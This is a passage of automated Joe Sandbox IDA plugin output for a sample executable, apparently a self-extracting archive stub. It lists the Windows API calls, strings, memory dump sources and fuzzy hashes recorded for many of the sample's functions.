                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005EC61
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 0004CD3C: _wcsrchr.LIBVCRUNTIME ref: 0004CD53
                                                            • _wcslen.LIBCMT ref: 0004D584
                                                            • _wcslen.LIBCMT ref: 0004D5CC
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 0005DE5F
                                                              • Part of subcall function 0004CA80: _wcslen.LIBCMT ref: 0004CA86
                                                            • _swprintf.LIBCMT ref: 0005DE93
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • SetDlgItemTextW.USER32(?,00000066,00092892), ref: 0005DEB3
                                                            • EndDialog.USER32(?,00000001), ref: 0005DFC0
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0004CF36
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0004B4E5,?,?,00000800,?,?,0004B4AA,?), ref: 0004CFD4
                                                            • _wcslen.LIBCMT ref: 0004D04A
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 0005C77D
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0005C7A2
                                                            • DeleteObject.GDI32(00000000), ref: 0005C7D4
                                                            • DeleteObject.GDI32(00000000), ref: 0005C7F7
                                                              • Part of subcall function 0005B6A2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C7CD,00000066), ref: 0005B6B5
                                                              • Part of subcall function 0005B6A2: SizeofResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6CC
                                                              • Part of subcall function 0005B6A2: LoadResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6E3
                                                              • Part of subcall function 0005B6A2: LockResource.KERNEL32(00000000,?,?,?,0005C7CD,00000066), ref: 0005B6F2
                                                              • Part of subcall function 0005B6A2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B70D
                                                              • Part of subcall function 0005B6A2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0005C7CD,00000066), ref: 0005B71E
                                                              • Part of subcall function 0005B6A2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B787
                                                              • Part of subcall function 0005B6A2: GlobalUnlock.KERNEL32(00000000), ref: 0005B7A6
                                                              • Part of subcall function 0005B6A2: GlobalFree.KERNEL32(00000000), ref: 0005B7AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                            • String ID: ]
                                                            • API String ID: 1428510222-3352871620
                                                            • Opcode ID: 552d29c2974ec0e96f58b30d20120fcf64aae31fe15e35c0e265084309d2a24f
                                                            • Instruction ID: 9f1654d0aed7ff9fee782327578e6edf2874577b581579121766af09fa2ed2b4
                                                            • Opcode Fuzzy Hash: 552d29c2974ec0e96f58b30d20120fcf64aae31fe15e35c0e265084309d2a24f
                                                            • Instruction Fuzzy Hash: 5101D236580B05ABE71127648C09EBF7ABEAFC5B53F140010FD00B7292EF759C0D8AA0
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005E61B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0005E631
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005E645
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 0005E654
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: fe6b934fb2cd53ee09d524c94e32e10dd37fe24738dfe2b032a9550eba7c68c5
                                                            • Instruction ID: 13830e8d0f91ba5d4e6ea2a750855a10b46ff0981b3c421af6fff8ffcaf42c7f
                                                            • Opcode Fuzzy Hash: fe6b934fb2cd53ee09d524c94e32e10dd37fe24738dfe2b032a9550eba7c68c5
                                                            • Instruction Fuzzy Hash: 92012832780B507BE1254B64DC09FAB77ADFB6B7C3F004401F781A60D0C6A65A09C779
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00069036,?,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002), ref: 000690A5
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000690B8
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00069036,?,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002,00000000), ref: 000690DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: eea930c519bd31e923dd3fa52d1d758d502aba2b0bd1b04292bc054a204548d1
                                                            • Instruction ID: 19db401786dccd9ffbe70437747e394d52952885fbd2374de48ded0caaaed7e5
                                                            • Opcode Fuzzy Hash: eea930c519bd31e923dd3fa52d1d758d502aba2b0bd1b04292bc054a204548d1
                                                            • Instruction Fuzzy Hash: A8F0AF30E00208BFEB519BA4DC09B9EBFB9EF04711F004064F909A2161CB785E91CA90
                                                            APIs
                                                              • Part of subcall function 00051B14: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                              • Part of subcall function 00051B14: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005061F
                                                            • GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005062F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
                                                            • Instruction ID: dff707dbc469262df8c65d8fa0593b5a37fe9b1060feac3165a6deed42d1ff62
                                                            • Opcode Fuzzy Hash: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
                                                            • Instruction Fuzzy Hash: 5EE04F70D857419EE7605F749808B877ED45B24712F01C81DA68D97152D7BCD884CB94
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: dba8f870a75fe8c328a6054a9cc72c25df116853d152323c8c56ad0877ee1f39
                                                            • Instruction ID: 5fa0d58475889755910c93b95617e9c3fe4dc4f532042cf6182d26f71e3650fb
                                                            • Opcode Fuzzy Hash: dba8f870a75fe8c328a6054a9cc72c25df116853d152323c8c56ad0877ee1f39
                                                            • Instruction Fuzzy Hash: 0D51E375A006029FDB298F14D851BAA77E7EF44320F24452DFD0667292DB71EE91CBD0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0006CF49
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CF6C
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CF92
                                                            • _free.LIBCMT ref: 0006CFA5
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CFB4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 6e3710fff46d6aa37b84cfbe55a20ef5d16295f5781010e16732d46848ff619b
                                                            • Instruction ID: e625e4cb7aac5444b940ee255dc756dbae742f632ef2c49135cdb436b9a7f9b5
                                                            • Opcode Fuzzy Hash: 6e3710fff46d6aa37b84cfbe55a20ef5d16295f5781010e16732d46848ff619b
                                                            • Instruction Fuzzy Hash: A9015E72A05615BF322167B65C4CC7BAAAFEFC6BA03140139BD4CD6201EF698C4295B0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,0006A640,0006C198,?,0006A393,00000001,00000364,?,0006524D,?,?,000830C4), ref: 0006A3EE
                                                            • _free.LIBCMT ref: 0006A423
                                                            • _free.LIBCMT ref: 0006A44A
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A457
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A460
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 2a23b074cb55388feee8eb008535b21e2a292817d92049e542297489627409f8
                                                            • Instruction ID: 8a1ff7e426686cbe727741d014cda72f34d40a729e9999de94c3f809099a6806
                                                            • Opcode Fuzzy Hash: 2a23b074cb55388feee8eb008535b21e2a292817d92049e542297489627409f8
                                                            • Instruction Fuzzy Hash: A601F932B4060167E22133746C8EA6B26ABDFC33607204024FB15F2163EFB88C015963
                                                            APIs
                                                              • Part of subcall function 000524BF: ResetEvent.KERNEL32(?), ref: 000524D1
                                                              • Part of subcall function 000524BF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000524E5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0005221A
                                                            • CloseHandle.KERNEL32(?,?), ref: 00052234
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 0005224D
                                                            • CloseHandle.KERNEL32(?), ref: 00052259
                                                            • CloseHandle.KERNEL32(?), ref: 00052265
                                                              • Part of subcall function 000522DC: WaitForSingleObject.KERNEL32(?,000000FF,000523F9,?,?,0005246F,?,?,?,?,?,00052459), ref: 000522E2
                                                              • Part of subcall function 000522DC: GetLastError.KERNEL32(?,?,0005246F,?,?,?,?,?,00052459), ref: 000522EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 76dccda88ec331ed11ca32c2408017cb382e2a3733e3ddef7bdc9c4c04fbfd70
                                                            • Instruction ID: 14fbd0a49271695eb18397b4568e5e1c82bb4774e6041cfdaa94e828d3973eac
                                                            • Opcode Fuzzy Hash: 76dccda88ec331ed11ca32c2408017cb382e2a3733e3ddef7bdc9c4c04fbfd70
                                                            • Instruction Fuzzy Hash: D9018876500744EFD722AF64DC84BC6BBA9FF08711F004929F36E62161C7797994CB94
                                                            APIs
                                                            • _free.LIBCMT ref: 0006D827
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006D839
                                                            • _free.LIBCMT ref: 0006D84B
                                                            • _free.LIBCMT ref: 0006D85D
                                                            • _free.LIBCMT ref: 0006D86F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
                                                            • Instruction ID: da5e6a227e21c59eb79db9d22739b1d0a504fafcae1b376581812328ea2b16dd
                                                            • Opcode Fuzzy Hash: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
                                                            • Instruction Fuzzy Hash: E3F0EC72B04610AFD6A0EB68E989C5B77DBBF457107644816F488E7611CE78FC808B60
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00053310
                                                            • _wcslen.LIBCMT ref: 00053321
                                                            • _wcslen.LIBCMT ref: 00053331
                                                            • _wcslen.LIBCMT ref: 0005333F
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0004C824,?,?,00000000,?,?,?), ref: 0005335A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: df9aed898cb248ec2a902634b6a1cd197b085821bde2363fa7b92205b5a10a86
                                                            • Instruction ID: 12b5fe9a52535c06d644559ddb7d30c099c532292579936e5baa8661e2358688
                                                            • Opcode Fuzzy Hash: df9aed898cb248ec2a902634b6a1cd197b085821bde2363fa7b92205b5a10a86
                                                            • Instruction Fuzzy Hash: B5F01732508114BBCF222F55EC09CCF3F26EB45BA1B228015FA1A6A462CE3296999691
                                                            APIs
                                                            • _free.LIBCMT ref: 00069B3E
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 00069B50
                                                            • _free.LIBCMT ref: 00069B63
                                                            • _free.LIBCMT ref: 00069B74
                                                            • _free.LIBCMT ref: 00069B85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
                                                            • Instruction ID: 048d6022db305618bc2cd9ece01d30f3ed5602053f9e084cd959ddc59fbf2905
                                                            • Opcode Fuzzy Hash: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
                                                            • Instruction Fuzzy Hash: E4F05E789059209BF6417F14FC4645A3BA7FBD77203514626F81962272CBFD48029F91
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: 162139932b92e932f6c770e009bcd4c0cc27997466e553a021746ea44381bcd5
                                                            • Instruction ID: 455eaf26493361d2cb9ed3eb27ed67a199e23521f3362c5b4cd15857e5259bad
                                                            • Opcode Fuzzy Hash: 162139932b92e932f6c770e009bcd4c0cc27997466e553a021746ea44381bcd5
                                                            • Instruction Fuzzy Hash: B3510671688302FAFA311E908D02F7F7695AF07B03F244616BF86740E7C6A16958B71B
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4wx72yFLka.exe,00000104), ref: 000691C0
                                                            • _free.LIBCMT ref: 0006928B
                                                            • _free.LIBCMT ref: 00069295
                                                            Strings
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\4wx72yFLka.exe
                                                            • API String ID: 2506810119-3764473980
                                                            • Opcode ID: 563eb2804663d8b99429048d0fdd2fd414c4f0922b6f9aa5fe27ddbfe808267c
                                                            • Instruction ID: 736af70b34cced3c4ffb705adf002e83942a15e3cc94349d0e838566bc3fe6ad
                                                            • Opcode Fuzzy Hash: 563eb2804663d8b99429048d0fdd2fd414c4f0922b6f9aa5fe27ddbfe808267c
                                                            • Instruction Fuzzy Hash: 5C319F71A04649FFEB21DB99DC85DAEBBEEEF86710F104066F80497602D7B48E408B91
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000641DB
                                                            • _abort.LIBCMT ref: 000642E6
                                                            Strings
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
                                                            • Instruction ID: 7ef1a4c8bd5b411bf6894e8302b429ee5b31ab7ab1dad83f8a4eb128912c158b
                                                            • Opcode Fuzzy Hash: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
                                                            • Instruction Fuzzy Hash: C4416B7190020AAFCF15DF98DC91AEEBBF6FF48304F688159FA04A7262D3359A50DB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00047F00
                                                              • Part of subcall function 000442DA: __EH_prolog.LIBCMT ref: 000442DF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00047FC5
                                                              • Part of subcall function 000486E4: GetCurrentProcess.KERNEL32(00000020,?), ref: 000486F3
                                                              • Part of subcall function 000486E4: GetLastError.KERNEL32 ref: 00048739
                                                              • Part of subcall function 000486E4: CloseHandle.KERNEL32(?), ref: 00048748
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 43cdb9478a311d35942e7b3a2bf640ffe60d75868a0d4d6d18159c33d5d82197
                                                            • Instruction ID: 5dc01d00ef30749bfa2d19fbabac339cdff45331d4b307c4a06b913480d21033
                                                            • Opcode Fuzzy Hash: 43cdb9478a311d35942e7b3a2bf640ffe60d75868a0d4d6d18159c33d5d82197
                                                            • Instruction Fuzzy Hash: 4631C8B1944244BAEF61EB64DC05FFE77A9BB44704F004036F949E7192DB788949CB64
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005BE38
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0005BE4D
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005BE62
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: 1cfa1a4795ceffc1b9a5ddc126f9730a82ef31f2c5f48ec5069c977986fc5b77
                                                            • Instruction ID: c418bdf585617ca280cc18923430205226762ff9b116e1ab0b05044dfe7f393d
                                                            • Opcode Fuzzy Hash: 1cfa1a4795ceffc1b9a5ddc126f9730a82ef31f2c5f48ec5069c977986fc5b77
                                                            • Instruction Fuzzy Hash: C611D632600611BFE6219F649D47FBB77A9FB4BB02F080011FB40AB0B5C766AD059765
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 0004EC54
                                                            • _strncpy.LIBCMT ref: 0004EC9A
                                                              • Part of subcall function 000530C5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00083070,?,0004EC28,00000000,?,00000050,00083070), ref: 000530E2
                                                            Strings
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: 612b387d7c9e5192f5a3db4afd794858d8e907d3b69a33185c5527c2253ea975
